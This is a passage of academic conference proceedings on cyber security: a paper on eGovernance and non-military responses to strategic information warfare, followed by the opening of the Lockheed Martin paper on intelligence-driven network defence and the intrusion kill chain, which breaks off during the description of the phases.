NATO Defence Planning Council (DPC) (2003) Decision Sheet, http://www.nato.int/docu/pr/2003/p030216e.htm,<br />
cf. Press Release (2003)013 at http://www.nato.int/docu/pr/2003/p03-013e.htm<br />
NATO NATO Glossary of Terms and Definitions (AAP-6) (annually updated publication) (quoted NATO Glossary)<br />
104
Ulf Haeussler<br />
NCSA (2009) NCSA Supports the Cyber Coalition 2009 undated,<br />
http://www.ncsa.nato.int/news/2009/20091217_NCSA_Supports_the_Cyber_Coalition_2009.html<br />
Owens, W.A., Dam, K.W. and Lin, H.S. (2009) (for the National Research Council) Technology, Policy, Law, and<br />
Ethics Regarding U.S. Acquisition and Use of Cyberattack Capabilities<br />
Oxford University Press (1989) Oxford Advanced Learner's Dictionary<br />
U.S. Department of Defense (DoD) Dictionary of Military and Associated Terms as amended through April 2010<br />
(JP 1-02) (quoted DoD Dictionary)<br />
Vamosi R. (2011) The US Needs To Learn To Limit–Not Win–A Cyber War,<br />
http://blogs.forbes.com/firewall/?p=2604<br />
Wikipedia "Zero Day Attack", http://en.wikipedia.org/wiki/Zero-day_attack (last visited 15 November 2010)<br />
105
eGovernance and Strategic Information Warfare – non<br />
Military Approach<br />
Karim Hamza and Van Dalen<br />
Maastricht School of Management, Netherlands<br />
hamza@msm.nl<br />
dalen@msm.nl<br />
Abstract: Most of the developed Governments, active in reaping the benefits of eGovernance, nowadays have<br />
discovered the threats of this new approach too. They invest massively to cope with the highly complex decision<br />
making systems of today, dramatic changes in economy, technology and Information Warfare threats plus<br />
government’s own changing strategies. This creates challenges with respect to matching decision-making<br />
structures. eGovernance Frameworks is defined by the UNESCO as “the use of ICT (Information and<br />
communication technologies) by different actors of the society with the aim to improve their access to information<br />
and to build their capacities”. It may be expected that eGovernance will have more strategic importance for many<br />
governments and that its concepts and tools will develop dramatically in the coming decade. This will raise the<br />
urgencies and importance of protecting government decision making processes from non-solicited disturbing<br />
external or internal interferences. Security is critical to the success of any eGovernance framework. Since such<br />
governance frameworks somehow will be open to interactions with different “stakeholders” Internally (within the<br />
boundaries of the state, like pressure groups, political parties, business, citizens ..) or Externally (e.g. other<br />
states, multinational businesses, worldwide operating malicious organizations,..) who may influence the decision<br />
making process in government, create political pressure or even start a cyber-war, by making use of<br />
eGovernance frameworks. This raises a number of prevention issues to cope with, like instability of the decision<br />
making processes, or even instability of real development processes in states. This causes efforts to add to the<br />
design process of eGovernance frameworks a new dimension, popularly labeled “Information Warfare Strategy”,<br />
with the aim to build in existing and future eGovernance Frameworks safeguarding tools; to prevent abuse of<br />
such frameworks in practical government decision cases. Traditionally there is a distinction between military vs.<br />
non-military approaches. The question has to be raised in how far a distinction between Technology (ICT) vs.<br />
non-Technology tools (like diplomacy, or legal) will be more appropriate. However we have to recognize that any<br />
line of distinction is arbitrary and will show the need for some dynamics, because parties involved will learn and<br />
improve.<br />
Keywords: eGovernment, government transformation, public sector information systems, e governance<br />
framework, information warfare, non military strategies<br />
1. Introduction<br />
Rapid change and development in the concept of eGovernance and Strategic information Warfare,<br />
makes it necessary to look for clear definition of both terms, examine the relation of each other and<br />
how they can impact government or state, primary findings showed that main common elements in<br />
these definition is Information and Technology, normally information is seen as a revolution age which<br />
need specific attention as Drucker mentioned “The next information revolution is well underway. But it<br />
is not happening where information scientists, information executives, and the information industry in<br />
general are looking for it. It is not a revolution in technology, machinery, techniques, software, or<br />
speed. It is a revolution in concepts” (Drucker, 1998). Also if we looked for a defensive point of view,<br />
Dearth mentioned “Defense is no longer the relatively straightforward issue of the sort and extent of<br />
physical measures that need to be taken to protect one’s valued assets. Many of the assets requiring<br />
protection are in the civil sector, but the protection of them is perhaps not best or properly done by<br />
military means” (Dearth, 2001). This requires tools and techniques which is not physical only but in<br />
concept and using non military approaches to protect the government information represented in<br />
eGovernance.<br />
Presence of threats like terrorists, competitors, state enemies and malicious organizations makes<br />
information warfare a threat to governments and the private sectors attached to eGovernance<br />
frameworks very important. It will raise high attention to develop strategic information warfare to<br />
protect dimensions, such as: Military, Physical, Economic, Political, and Social (RAND, 1996).<br />
Governments have to develop technological as well as non-technological tools and mechanisms that<br />
can supplement dynamic eGovernance frameworks. Application domains encompass fields like<br />
Political, Legal and Diplomatic. Interaction between agencies inside and outside the government, in<br />
addition to international affairs will be needed to define international legal regulations and political<br />
channels to control relevant threats. In the end, it will certainly require (re)definition of the distribution<br />
106
Karim Hamza and Van Dalen<br />
of responsibilities for international legal arrangements in case of legal disputes, as the ones taking<br />
place in the United Nations or NATO. Special attention has to be devoted to the problem of void<br />
governance spaces, example in this continually changing playing field, asking for occasional<br />
governance solutions sometimes.<br />
This research examines Non Military and non technology approaches to Strategic Information Warfare<br />
related to the development of an eGovernance Framework Design Process Model with regard to<br />
Economic, Political and Social dimensions.<br />
With the following concentrations:<br />
Definition of eGovernance framework<br />
Definition of Strategic Information Warfare<br />
Types of Information Warfare: Cyber War / Cyber Crime / Espionage<br />
Types of threats Internal / External and State / Non State<br />
Importance of eGovernance National security and the need to be covered in Information warfare<br />
strategies.<br />
Non Military response: Policies, Laws, Diplomacies, Awareness and Media<br />
Adaptability on dynamic eGovernance framework<br />
what conditions of Strategic Information warfare have to be taken into account in the design<br />
process of eGovernance frameworks<br />
All conditioned by fundamental civil rights to interact with governments and the control on the legality<br />
of such approaches.<br />
2. eGovernance frame work<br />
Nowadays ‘ eGovernance’ as a term became a very common expression in the last couple of years,<br />
but there is no standard definition for this term; since Different governments and organizations use it<br />
to suit specific aims or objectives. Commonly the term ‘eGovernment’ is used instead of ‘<br />
eGovernance’ due to confusion between the definitions of the two terms, while the first is the<br />
infrastructure of eGovernance and eGovernance covers a broader scope.<br />
So If we start by Governance which is focusing on what the government does to make sure that all<br />
concerned stakeholders are in the decision process and evaluate the outcomes, also which can be<br />
applied on corporate level, governance have different types like Corporate Governance, Project<br />
Governance, Good Governance, IT Governance, multi level governance and finally E Governance<br />
which focuses on the function of Governance using the technology and information systems as a tool.<br />
Normally we finds that The most common definition for eGovernance is defined by the UNESCO as<br />
“the use of ICT (Information and communication technologies) by different actors of the society, with<br />
the aim to improve their access to information and to build their capacities” (UNESCO, 2009). In much<br />
more detail according to the UNESCO, Governance refers to the exercise of political, economic and<br />
administrative authority in the management of a country’s affairs, including citizens’ articulation of their<br />
interests and exercise of their legal rights and obligations. eGovernance may be understood as the<br />
performance of this governance via the electronic medium in order to facilitate an efficient, speedy<br />
and transparent process of disseminating information to the public, and other agencies, and for<br />
performing government administration activities. eGovernance is generally considered as a wider<br />
concept than eGovernment, since it can bring about a change in the way how citizens relate to<br />
governments and to each other. eGovernance can bring forth new concepts of citizenship, both in<br />
terms of citizen needs and responsibilities. Its objective is to engage, enable and empower the citizen<br />
(different stakeholders). The use of information technology can increase the broad involvement of<br />
citizens in the process of governance at all levels by providing the possibility of on-line discussion<br />
groups and by enhancing the rapid development and effectiveness of pressure groups.<br />
It is obvious that Advantages for the government include the government’s ability to provide a better<br />
service in terms of time, making governance more efficient and more effective. In addition, the<br />
transaction costs can be lowered and government services become more accessible.<br />
107
Karim Hamza and Van Dalen<br />
This leads to the eGovernance Framework which organizes the eGovernance activity and focuses on:<br />
1. Establishing the governance, monitoring and control,<br />
2. Develop and response strategic direction for the different stakeholders,<br />
3. Defining roles and responsibility matrix and<br />
4. adapt to new changes in strategies<br />
Since eGovernance will be responsible to hold most of the government, economy and community<br />
information plus it will engage different stake holders internal and external to the country, then security<br />
and protection will become the biggest concern. As fear of all fears. (Mechling, 2000) mentioned that one<br />
of the most common issues in Governance are: Protecting privacy and security, which is one of the<br />
major concerns and can be considered as an obstacle for such systems. Substantially, defense and<br />
security of this framework will be Critical to its success, the political risks of security breaches in this<br />
framework perceived to be far more serious than other risks, since it can impact the government’s<br />
political position, the economy and citizens.<br />
3. Strategic information warfare<br />
The concept of Information Warfare has been well documented (for example, Schwartau, 1996;<br />
Dearth and Williamson, 1996; Knecht, 1996; Waltz, 1998; Denning, 1999). By definition, the<br />
fundamental weapon and target in the information’s warfare is 'information'. It is the product that has<br />
to be manipulated to the advantage of those trying to influence events. The means of achieving this<br />
are manifold. Protagonists can attempt to directly alter data or to deprive competitors from access to<br />
it. The technology of information collection, storage, and dissemination can be compromised. Using<br />
other, more subtle techniques, the way the data is interpreted can be changed by altering the context<br />
that it is viewed. Thus, the range of activities in the brief of information warfare is manifest. (Hutchinson,<br />
Warren, 2001)<br />
Figure 1: The relationships between data, context, knowledge, information; and the methods by<br />
which each element can be attacked, (Hutchinson, Warren, 2001)<br />
108
Karim Hamza and Van Dalen<br />
From a military point of view, there is an enemy defined and specific actions and procedures are<br />
prepared for defense or attack, but with eGovernance not all enemies are defined or detected which<br />
encourages delivering a concept to detect such enemies or threats.<br />
There were different definitions and concepts related to information warfare (Libicki, 1995)<br />
Command-and-Control Warfare [C2W];<br />
Intelligence-based Warfare [IBW];<br />
Electronic Warfare [EW];<br />
Psychological Operations [PSYOPS];<br />
Hacker war software-based attacks on information systems;<br />
Information Economic Warfare [IEW] war via the control of information trade;<br />
Cyberwar [combat in the virtual realm].<br />
As an example; The United States has substantial information-based resources, including complex<br />
management systems and infrastructures involving the control of electric power, money flow, air<br />
traffic, oil and gas, and other information-dependent items. U.S. allies and potential coalition partners<br />
are similarly increasingly dependent on various information infrastructures. Conceptually, if and when<br />
potential adversaries attempt to damage these systems using IW techniques, information warfare<br />
inevitably takes on a strategic aspect. (Roger, Molander, Riddile, Wilson, 1996)<br />
The Basic Features of Strategic Information Warfare:<br />
Low entry cost: Unlike traditional weapon technologies, development of information- based<br />
techniques does not require sizable financial resources or state sponsorship. Information systems<br />
expertise and access to important networks may be the only prerequisites.<br />
Blurred traditional boundaries: Traditional distinctions; public versus private interests, warlike<br />
versus criminal behavior and geographic boundaries, such as those between nations as<br />
historically defined, are complicated by the growing interaction within the information<br />
infrastructure.<br />
4. Types of information warfare: Cyber war / cyber crime / espionage<br />
The Department of Defense (DoD) defines cyberspace as follows: A global domain within the<br />
information environment consisting of the interdependent network of information technology<br />
infrastructures, including the Internet, telecommunications networks, computer systems, and<br />
embedded processors and controllers. (DoD Dictionary of Military, 2008)<br />
Recently, cyberspace which is becoming the main field of information warfare started to develop as a<br />
military domain. To join the historic domains of land, sea, air, and space. All this might lead to a belief<br />
that the historic constructs of war like force, offense, defense, and deterrence can be applied to<br />
cyberspace with a little modification. But it must be understood in its own terms, and policy decisions<br />
being made for these and other new commands must reflect such understanding. Attempts to transfer<br />
policy constructs from other forms of warfare will not only fail but also hinder policy and<br />
planning.(Libicki, 2009)<br />
Normally the main targets for an Information Attack as Denning (1999) outlines the potential elements<br />
in an information system that are prone to attack and exploitation as:<br />
Data stores: for example, computer and human memories.<br />
Communication channels: for example, humans, and telecommunication systems.<br />
Sensors/input devices: for example, scanners, cameras, microphones, human senses.<br />
Output devices: for example, disk writers, printers, human processes.<br />
Manipulators of data: for example, microprocessors, humans, software.<br />
Most related information warfare was as below:<br />
Strategic Cyber-War: A campaign of Cyber-Attacks launched by one entity against a state and<br />
its society, primarily but not exclusively for the purpose of affecting the target state’s behavior,<br />
would be strategic Cyber-War. The attacking entity can be a state or a non-state actor (Libicki, 2009)<br />
109
Karim Hamza and Van Dalen<br />
Cyber-War: actions by a nation-state to penetrate another nation's computers or networks for the<br />
purposes of causing damage or disruption. (Clarke, 2010)<br />
Cyber Crime: refers to any crime that involves a computer and a network, where the computers<br />
may or may not have played an instrumental part in the commission of a crime<br />
Espionage or spying: involves individuals obtaining information that is considered secret or<br />
confidential without the permission of the holder of this information.<br />
5. Types of threats internal / external and state / non state<br />
Critical to the success of any eGovernance framework, is its security. Since such governance<br />
frameworks somehow will be open to interactions with different “stakeholders”, who may, by making<br />
use of eGovernance frameworks, influence the decision making process in the government, create<br />
political pressure or even start a cyber-war.<br />
A. Internal Stakeholders [Domestic] (within the boundaries of the state) as<br />
Pressure groups,<br />
Political parties,<br />
Business,<br />
Citizens<br />
Organized crime .. etc<br />
or<br />
B. External Stakeholders [Foreign] (outside boundaries of the state) as<br />
Other states,<br />
Multinational businesses,<br />
Worldwide operating malicious organizations,.. etc<br />
Given the wide array of possible opponents, weapons, and strategies, it becomes increasingly difficult<br />
to distinguish between foreign and domestic sources of IW threats and actions. You may not know<br />
who’s under attack by whom, or who’s in charge of the attack. This greatly complicates the traditional<br />
role distinction between domestic law enforcement, on the one hand, and national security and<br />
intelligence entities on the other. Another consequence of this blurring phenomenon is the<br />
disappearance of clear distinctions between different levels of anti-state activity, ranging from crime to<br />
warfare. (Roger, Molander, Riddile, Wilson, 1996)<br />
6. Importance of eGovernance national security and the need to be covered in<br />
information warfare strategies<br />
Presence of threats, like: terrorists, competitors, state enemies and malicious organizations makes<br />
the threat of information warfare very important to governments and private sector attached to<br />
eGovernance frameworks. It will raise a high attention to develop strategic information warfare to<br />
protect dimensions as: Military, Physical, Economic, Political, And Social (Roger, Molander, Riddile, Wilson,<br />
1996).<br />
7. Non military response: Policies, laws, diplomacies, awareness and media<br />
Governments have to develop military as well as non-military tools and mechanisms that can<br />
supplement dynamic eGovernance frameworks. Application domains encompass fields like Political,<br />
Legal and Diplomatic. Interaction between agencies inside and outside the government, in addition to<br />
international affairs will be needed to define international legal regulations and political channels to<br />
control relevant threats. In the end, it will certainly require a (re)definition of the distribution of<br />
responsibilities for international legal arrangements in case of legal disputes, as that’s taking place in<br />
the United Nations or NATO.<br />
The appropriate role for the government in responding to the strategic Information Warfare threat<br />
impacting the eGovernance framework needs to be addressed, this role to be part leadership and part<br />
partnership with the domestic sector. In addition to being the performer of certain basic functions such<br />
as; organizing, equipping, training, and sustaining military forces, the government may play a more<br />
110
Karim Hamza and Van Dalen<br />
productive and efficient role as facilitator and maintainer of some information systems and<br />
infrastructure, and through policy mechanisms such as; tax breaks to encourage reducing vulnerability<br />
and improving recovery and reconstitution capability. An important factor is the traditional change in<br />
the government’s role as one move from national defense through public safety toward things that<br />
represent the public good. Clearly, the government’s perceived role in this area will have to be<br />
balanced against public perceptions of the loss of civil liberties and the commercial sector’s concern<br />
about unwarranted limits on its practices and markets.<br />
When responding to information warfare, military strategy can thus no longer focus just on support to<br />
and operations. It must also examine information warfare implications on its state and allies’ strategic<br />
infrastructures military, physical, economic, political, and social that depends upon information<br />
systems and information support.<br />
Figure 2: Strategic information warfare impact , (Roger, Molander, Riddile, Wilson, 1996)<br />
Government can use and develop different tools and techniques to handle such situation<br />
Research and Development: The government’s role in defending against such threats, apart from<br />
protecting its own systems, is indirect: Sponsor research, development, and standard creation in<br />
computer network defense. Maximize the incentives for private industry to keep its own house in<br />
order. Increase the resources devoted to cyber forensics, including the distribution of honeypots<br />
to trap rogue code for analysis. Encourage information-sharing among both private and public<br />
network operators. Invest in threat intelligence. Subsidize the education of computer security<br />
professionals. All are current agenda items. In a cyberwar, all would receive greater emphasis.<br />
(LibiCki, 2009)<br />
Policy : defining policies that deals with different Strategic Information Warfare threats and<br />
engage different international parties , also working on modify constitutes an act of war, which<br />
may be defined as one of three ways: universally, multilaterally, and unilaterally. A universal<br />
definition is one that every state accepts. The closest analog to “every state” is when the United<br />
Nations says that something is an act of war. The next-closest analog is if enough nations have<br />
signed a treaty that says as much. No such United Nations dictum exists, and no treaty says as<br />
much. One might argue that a cyber attack (which is an output of Strategic Information warfare) is<br />
like something else that is clearly an act of war, but unless there is a global consensus that such<br />
an analogy is valid, it cannot be defined as an act of war.<br />
Laws : develop clear laws to criminalize action which threat eGovernance framework specially<br />
with internal threat<br />
Diplomatic : develop allies networks to discover different joint threats that can impact each other<br />
Governance through intelligence and early detections<br />
111
Karim Hamza and Van Dalen<br />
Awareness and Media : create citizen/personal awareness working and dealing with<br />
eGovernance framework, on how to protect themselves, how to report violation, be awre with<br />
different types of threat and the legal impact of violation<br />
8. Conclusion<br />
It is becoming obvious that eGovernance will become the information backbone of any government<br />
which creates a strong relation to strategic information warfare; since both are based on information<br />
and use technology. In addition, the first will contain most of the government’s and community<br />
information and will become the main war fields in the future. This requires different set of attention;<br />
since not all existing warfare techniques will be applicable in handling eGovernance threats; this<br />
should include non military approaches like Policy, diplomatic and laws.<br />
eGovernance framework main challenge is adaptability on dynamic eGovernance framework; since<br />
continuous changes on government strategies and the environment surrounding it plus the continuous<br />
changes of technology and threat parties either internal or external, will require continuous<br />
development to cope with such changes and complex decision making structure, not to forget that<br />
some conditions of strategic information warfare have to be taken into account in the design process<br />
of eGovernance frameworks, like: control of different stakeholders, monitor and detection, continuous<br />
development and defining different sets of response approaches to deal with the rapid changing<br />
environment and changing enemy map.<br />
References<br />
Bhatnagar, Subash EGovernment: From Vision to Implementation” by; Sage Publications; 2004.<br />
Clarke , Richard A. (April, 2010) Cyber War: The Next Threat to National Security and What to Do About, Ecco<br />
Dearth, Douglas H., (2001) “Implications and Challenges of Applied Information Operations”, Joint Military<br />
Intelligence Training Centre Washington D.C. Journal of Information Warfare Volume 1, Issue1<br />
Denning, D.E. (1999). Information Warfare and Security, Addison Wesley, Reading: Mass.<br />
DoD Dictionary of Military Terms (October,2008), Washington, D.C, Joint Doctrine Division, J-7<br />
Drucker, Peter F. (August 24, 1998) “the Next Information Revolution” , Forbes ASAP.<br />
Hutchinson, W. and Warren, M. (2001) “Principles of Information Warfare”, Journal of Information Warfare 1, 1:1 -<br />
6 1 ISSN 1445-3312 print/ISSN 1445-3347<br />
Hutchinson, W.E. Warren, M.J. (1999). Attacking the Attackers: Attitudes of Australian IT Managers to retaliation<br />
against Hackers, ACIS (Australasian <strong>Conference</strong> on Information Systems) 99, December, Wellington, New<br />
Zealand.<br />
Libicki, Martin C. (2009) CyberDeterrence and CyberWar , Rand Corporation, Project Air Force<br />
Libicki, Martin C.(May,1995) “What Is Information Warfare?” Strategic<br />
Mechling, J. (2000), Eight Imperatives for Leaders in a Networked World, Massachusetts, The Harvard Policy<br />
Group<br />
Roger C. Molander/Andrew S. Riddile/Peter A. Wilson (1996) “Strategic Information Warfare, A New Face of<br />
War” Office of the Secretary of Defense, National Defense Research Institute , Rand<br />
Schwartau, W. (1996). Information Warfare – second edition. Thunder’s Mouth Press, New York.<br />
UNESCO(2009) http://portal.unesco.org/ci/en/ev.php-<br />
URL_ID=4404&URL_DO=DO_TOPIC&URL_SECTION=201.html (extracted 07.10.2010)<br />
Waltz, E. (1998) Information Warfare – Principles and Operations. Artech House, Norwood.<br />
World Bank : Source: http://go.worldbank.org/M1JHE0Z280 (extracted on 02.10.2010)<br />
112
Intelligence-Driven Computer Network Defense Informed<br />
by Analysis of Adversary Campaigns and Intrusion Kill<br />
Chains<br />
Eric Hutchins, Michael Cloppert and Rohan Amin<br />
Lockheed Martin, USA<br />
eric.m.hutchins@lmco.com<br />
michael.j.cloppert@lmco.com<br />
rohan.m.amin@lmco.com<br />
Abstract: Conventional network defense tools such as intrusion detection systems and anti-virus focus on the<br />
vulnerability component of risk, and traditional incident response methodology presupposes a successful<br />
intrusion. An evolution in the goals and sophistication of computer network intrusions has rendered these<br />
approaches insufficient for certain actors. A new class of threats, appropriately dubbed the “Advanced Persistent<br />
Threat” (APT), represents well-resourced and trained adversaries that conduct multi-year intrusion campaigns<br />
targeting highly sensitive economic, proprietary, or national security information. These adversaries accomplish<br />
their goals using advanced tools and techniques designed to defeat most conventional computer network<br />
defense mechanisms. Network defense techniques which leverage knowledge about these adversaries can<br />
create an intelligence feedback loop, enabling defenders to establish a state of information superiority which<br />
decreases the adversary's likelihood of success with each subsequent intrusion attempt. Using a kill chain model<br />
to describe phases of intrusions, mapping adversary kill chain indicators to defender courses of action, identifying<br />
patterns that link individual intrusions into broader campaigns, and understanding the iterative nature of<br />
intelligence gathering form the basis of intelligence-driven computer network defense (CND). Institutionalization<br />
of this approach reduces the likelihood of adversary success, informs network defense investment and resource<br />
prioritization, and yields relevant metrics of performance and effectiveness. The evolution of advanced persistent<br />
threats necessitates an intelligence-based model because in this model the defenders mitigate not just<br />
vulnerability, but the threat component of risk, too.<br />
Keywords: incident response, intrusion detection, intelligence, threat, APT, computer network defense<br />
1. Introduction<br />
As long as global computer networks have existed, so have malicious users intent on exploiting<br />
vulnerabilities. Early evolutions of threats to computer networks involved self-propagating code.<br />
Advancements over time in anti-virus technology significantly reduced this automated risk. More<br />
recently, a new class of threats, intent on the compromise of data for economic or military<br />
advancement, emerged as the largest element of risk facing some industries. This class of threat has<br />
been given the moniker “Advanced Persistent Threat,” or APT. To date, most organizations have<br />
relied on the technologies and processes implemented to mitigate risks associated with automated<br />
viruses and worms which do not sufficiently address focused, manually operated APT intrusions.<br />
Conventional incident response methods fail to mitigate the risk posed by APTs because they make<br />
two flawed assumptions: response should happen after the point of compromise, and the compromise<br />
was the result of a fixable flaw (Mitropoulos et al., 2006; National Institute of Standards and<br />
Technology, 2008).<br />
APTs have recently been observed and characterized by both industry and the U.S. government. In<br />
June and July 2005, the U.K. National Infrastructure Security Co-ordination Centre (UK-NISCC) and<br />
the U.S. Computer Emergency Response Team (US-CERT) issued technical alert bulletins describing<br />
targeted, socially-engineered emails dropping trojans to exfiltrate sensitive information. These<br />
intrusions were over a significant period of time, evaded conventional firewall and anti-virus<br />
capabilities, and enabled adversaries to harvest sensitive information (UK-NISCC, 2005; US-CERT,<br />
2005). Epstein and Elgin (2008) of Business Week described numerous intrusions into NASA and<br />
other government networks where APT actors were undetected and successful in removing sensitive<br />
high-performance rocket design information. In February 2010, iSec Partners noted that current<br />
approaches such as anti-virus and patching are not sufficient, end users are directly targeted, and<br />
threat actors are after sensitive intellectual property (Stamos, 2010).<br />
Before the U.S. House Armed Services Committee Subcommittee on Terrorism, Unconventional<br />
Threats and Capabilities, James Andrew Lewis of the Center for Strategic and International Studies<br />
testified that intrusions occurred at various government agencies in 2007, including the Department of<br />
113
Eric Hutchins et al.<br />
Defense, State Department and Commerce Department, with the intention of information collection<br />
(Lewis, 2008). With specificity about the nature of computer network operations reportedly emanating<br />
from China, the 2008 and 2009 reports to Congress of the U.S.-China Economic and Security Review<br />
Commission summarized reporting of targeted intrusions against U.S. military, government and<br />
contractor systems. Again, adversaries were motivated by a desire to collect sensitive information<br />
(U.S.-China Economic and Security Review Commission, 2008, 2009). Finally, a report prepared for<br />
the U.S.-China Economic and Security Review Commission, Krekel (2009) profiles an advanced<br />
intrusion with extensive detail demonstrating the patience and calculated nature of APT.<br />
Advances in infrastructure management tools have enabled best practices of enterprise-wide patching<br />
and hardening, reducing the most easily accessible vulnerabilities in networked services. Yet APT<br />
actors continually demonstrate the capability to compromise systems by using advanced tools,<br />
customized malware, and “zero-day” exploits that anti-virus and patching cannot detect or mitigate.<br />
Responses to APT intrusions require an evolution in analysis, process, and technology; it is possible<br />
to anticipate and mitigate future intrusions based on knowledge of the threat. This paper describes an<br />
intelligence-driven, threat-focused approach to study intrusions from the adversaries’ perspective.<br />
Each discrete phase of the intrusion is mapped to courses of action for detection, mitigation and<br />
response. The phrase “kill chain” describes the structure of the intrusion, and the corresponding<br />
model guides analysis to inform actionable security intelligence. Through this model, defenders can<br />
develop resilient mitigations against intruders and intelligently prioritize investments in new technology<br />
or processes. Kill chain analysis illustrates that the adversary must progress successfully through<br />
each stage of the chain before it can achieve its desired objective; just one mitigation disrupts the<br />
chain and the adversary. Through intelligence-driven response, the defender can achieve an<br />
advantage over the aggressor for APT caliber adversaries.<br />
This paper is organized as follows: section two of this paper documents related work on phase based<br />
models of defense and countermeasure strategy. Section three introduces an intelligence-driven<br />
computer network defense model (CND) that incorporates threat-specific intrusion analysis and<br />
defensive mitigations. Section four presents an application of this new model to a real case study, and<br />
section five summarizes the paper and presents some thoughts on future study.<br />
2. Related work<br />
While the modeling of APTs and corresponding response using kill chains is unique, other phase<br />
based models to defensive and countermeasure strategies exist.<br />
A United States Department of Defense Joint Staff publication describes a kill chain with stages find,<br />
fix, track, target, engage, and assess (U.S. Department of Defense, 2007). The United States Air<br />
Force (USAF) has used this framework to identify gaps in Intelligence, Surveillance and<br />
Reconnaissance (ISR) capability and to prioritize the development of needed systems (Tirpak, 2000).<br />
Threat chains have also been used to model Improvised Explosive Device (IED) attacks (National<br />
Research Council, 2007). The IED delivery chain models everything from adversary funding to attack<br />
execution. Coordinated intelligence and defensive efforts focused on each stage of the IED threat<br />
chain as the ideal way to counter these attacks. This approach also provides a model for identification<br />
of basic research needs by mapping existing capability to the chain. Phase based models have also<br />
been used for antiterrorism planning. The United States Army describes the terrorist operational<br />
planning cycle as a seven step process that serves as a baseline to assess the intent and capability<br />
of terrorist organizations (United States Army Training and Doctrine Command, 2007). Hayes (2008)<br />
applies this model to the antiterrorism planning process for military installations and identifies<br />
principles to help commanders determine the best ways to protect themselves.<br />
Outside of military context, phase based models have also been used in the information security field.<br />
Sakuraba et al. (2008) describe the Attack-Based Sequential Analysis of Countermeasures (ABSAC)<br />
framework that aligns types of countermeasures along the time phase of an attack. The ABSAC<br />
approach includes more reactive post-compromise countermeasures than early detection capability to<br />
uncover persistent adversary campaigns. In an application of phase based models to insider threats,<br />
Duran et al. (2009) describe a tiered detection and countermeasure strategy based on the progress of<br />
malicious insiders. Willison and Siponen (2009) also address insider threat by adapting a phase<br />
based model called Situational Crime Prevention (SCP). SCP models crime from the offender’s<br />
perspective and then maps controls to various phases of the crime. Finally, the security company<br />
Mandiant proposes an “exploitation life cycle”. The Mandiant model, however, does not map courses<br />
114
Eric Hutchins et al.<br />
of defensive action and is based on post-compromise actions (Mandiant, 2010). Moving detections<br />
and mitigations to earlier phases of the intrusion kill chain is essential for CND against APT actors.<br />
3. Intelligence-driven computer network defense<br />
Intelligence-driven computer network defense is a risk management strategy that addresses the<br />
threat component of risk, incorporating analysis of adversaries, their capabilities, objectives, doctrine<br />
and limitations. This is necessarily a continuous process, leveraging indicators to discover new<br />
activity with yet more indicators to leverage. It requires a new understanding of the intrusions<br />
themselves, not as singular events, but rather as phased progressions. This paper presents a new<br />
intrusion kill chain model to analyze intrusions and drive defensive courses of action.<br />
The effect of intelligence-driven CND is a more resilient security posture. APT actors, by their nature,<br />
attempt intrusion after intrusion, adjusting their operations based on the success or failure of each<br />
attempt. In a kill chain model, just one mitigation breaks the chain and thwarts the adversary,<br />
therefore any repetition by the adversary is a liability that defenders must recognize and leverage. If<br />
defenders implement countermeasures faster than adversaries evolve, it raises the costs an<br />
adversary must expend to achieve their objectives. This model shows, contrary to conventional<br />
wisdom, such aggressors have no inherent advantage over defenders.<br />
3.1 Indicators and the indicator life cycle<br />
The fundamental element of intelligence in this model is the indicator. For the purposes of this paper,<br />
an indicator is any piece of information that objectively describes an intrusion. Indicators can be<br />
subdivided into three types:<br />
Atomic – Atomic indicators are those which cannot be broken down into smaller parts and retain<br />
their meaning in the context of an intrusion. Typical examples here are IP addresses, email<br />
addresses, and vulnerability identifiers.<br />
Computed – Computed indicators are those which are derived from data involved in an incident.<br />
Common computed indicators include hash values and regular expressions.<br />
Behavioral – Behavioral indicators are collections of computed and atomic indicators, often<br />
subject to qualification by quantity and possibly combinatorial logic. An example would be a<br />
statement such as ”the intruder would initially used a backdoor which generated network traffic<br />
matching [regular expression] at the rate of [some frequency] to [some IP address], and then<br />
replace it with one matching the MD5 hash [value] once access was established.”<br />
Using the concepts in this paper, analysts will reveal indicators through analysis or collaboration,<br />
mature these indicators by leveraging them in their tools, and then utilize them when matching activity<br />
is discovered. This activity, when investigated, will often lead to additional indicators that will be<br />
subject to the same set of actions and states. This cycle of actions, and the corresponding indicator<br />
states, form the indicator life cycle illustrated in Figure 1.<br />
Figure 1: Indicator life cycle states and transitions<br />
115
Eric Hutchins et al.<br />
This applies to all indicators indiscriminately, regardless of their accuracy or applicability. Tracking the<br />
derivation of a given indicator from its predecessors can be time-consuming and problematic if<br />
sufficient tracking isn’t in place, thus it is imperative that indicators subject to these processes are<br />
valid and applicable to the problem set in question. If attention is not paid to this point, analysts may<br />
find themselves applying these techniques to threat actors for which they were not designed, or to<br />
benign activity altogether.<br />
3.2 Intrusion kill chain<br />
A kill chain is a systematic process to target and engage an adversary to create desired effects. U.S.<br />
military targeting doctrine defines the steps of this process as find, fix, track, target, engage, assess<br />
(F2T2EA): find adversary targets suitable for engagement; fix their location; track and observe; target<br />
with suitable weapon or asset to create desired effects; engage adversary; assess effects (U.S.<br />
Department of Defense, 2007). This is an integrated, end-to-end process described as a “chain”<br />
because any one deficiency will interrupt the entire process.<br />
Expanding on this concept, this paper presents a new kill chain model, one specifically for intrusions.<br />
The essence of an intrusion is that the aggressor must develop a payload to breach a trusted<br />
boundary, establish a presence inside a trusted environment, and from that presence, take actions<br />
towards their objectives, be they moving laterally inside the environment or violating the<br />
confidentiality, integrity, or availability of a system in the environment. The intrusion kill chain is<br />
defined as reconnaissance, weaponization, delivery, exploitation, installation, command and control<br />
(C2), and actions on objectives.<br />
With respect to computer network attack (CNA) or computer network espionage (CNE), the definitions<br />
for these kill chain phases are as follows:<br />
Reconnaissance - Research, identification and selection of targets, often represented as crawling<br />
Internet websites such as conference proceedings and mailing lists for email addresses, social<br />
relationships, or information on specific technologies.<br />
Weaponization - Coupling a remote access trojan with an exploit into a deliverable payload,<br />
typically by means of an automated tool (weaponizer). Increasingly, client application data files<br />
such as Adobe Portable Document Format (PDF) or Microsoft Office documents serve as the<br />
weaponized deliverable.<br />
Delivery - Transmission of the weapon to the targeted environment. The three most prevalent<br />
delivery vectors for weaponized payloads by APT actors, as observed by the Lockheed Martin<br />
Computer Incident Response Team (LM-CIRT) for the years 2004-2010, are email attachments,<br />
websites, and USB removable media.<br />
Exploitation - After the weapon is delivered to victim host, exploitation triggers intruders’ code.<br />
Most often, exploitation targets an application or operating system vulnerability, but it could also<br />
more simply exploit the users themselves or leverage an operating system feature that autoexecutes<br />
code.<br />
Installation - Installation of a remote access trojan or backdoor on the victim system allows the<br />
adversary to maintain persistence inside the environment.<br />
